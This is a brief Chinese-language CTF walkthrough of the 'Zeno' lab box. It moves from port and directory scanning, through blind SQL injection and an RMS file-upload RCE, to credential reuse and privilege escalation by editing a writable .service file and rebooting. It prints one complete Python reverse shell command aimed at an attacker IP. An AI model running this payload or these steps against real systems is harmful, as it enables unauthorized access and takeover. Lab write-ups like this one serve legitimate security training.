Zeno
你有和伟大的斯多葛派哲学家芝诺一样的耐心吗?试试吧!
端口扫描
循例 nmap
Web枚举
进到12340端口
目录扫描
/rms是一个业务站点
在admin登录页面尝试弱口令和注入,也都没有成功
SQLI
在点餐这发现了个get参数id,尝试sql注入
最终在这个页面,是时间盲注
sqlmap
这里尝试了很久sqlmap便秘了,一直爆不出来东西
RCE
在主页中找到rms的全名,通过searchsploit找到一个rce
大概是foods-exec.php存在未授权任意文件上传导致可以上传php并执行
利用exp,一句话成功上传
这里python3可用,利用python reverse shell,payload:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.14.39.48",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
横向移动
翻了很久,都没有找到啥东西,藏的有点深
传个linPEAS过去,把结果传回攻击机
linPEAS结果中存在pwnkit,但先不用
还发现了一组凭据
尝试使用这个密码登录edward
成功
权限提升
sudo -l,还是第一次见reboot
在linPEAS结果中,还有一个
我们有权编辑该服务配置文件,查看该文件
那么利用思路就是,虽然我们无权重启服务,但可以reboot,修改配置文件执行恶意操作,reboot后将会执行
修改.service
写入.service
reboot
getroot
